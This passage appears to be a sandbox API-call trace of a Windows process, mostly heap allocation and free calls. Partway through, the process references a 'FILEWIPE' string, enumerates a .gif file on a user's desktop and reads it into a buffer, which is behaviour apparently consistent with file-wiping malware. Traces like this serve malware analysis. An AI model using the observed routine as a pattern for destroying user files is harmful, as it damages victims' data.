HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0164.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0164.465] CloseHandle (hObject=0x138) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0164.465] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.465] CloseHandle (hObject=0x120) returned 1 [0164.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0164.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0164.468] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0164.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0164.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa48008 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0164.474] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.474] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.474] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.475] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\e5mhiatvfij2bqac0v.gif")) returned 0x20 [0164.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0164.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.475] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4262450, ftCreationTime.dwHighDateTime=0x1d5def5, ftLastAccessTime.dwLowDateTime=0x8e9e2530, ftLastAccessTime.dwHighDateTime=0x1d5e74b, ftLastWriteTime.dwLowDateTime=0x8e9e2530, ftLastWriteTime.dwHighDateTime=0x1d5e74b, nFileSizeHigh=0x0, nFileSizeLow=0xbc0c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="E5mhIaTvFij2bqaC0v.gif", cAlternateFileName="E5MHIA~1.GIF")) returned 0x90af58 [0164.475] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0164.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0164.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0164.476] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0164.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0164.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0164.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0164.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0164.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0164.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0164.477] CharLowerBuffW (in: lpsz="byte[48140]", cchLength=0xb | out: lpsz="byte[48140]") returned 0xb [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0164.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0164.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0164.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0164.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0164.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xbc0c) returned 0x9c5180 [0164.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0164.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0164.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0164.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0164.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0164.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0164.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0164.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0164.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0164.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.488] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 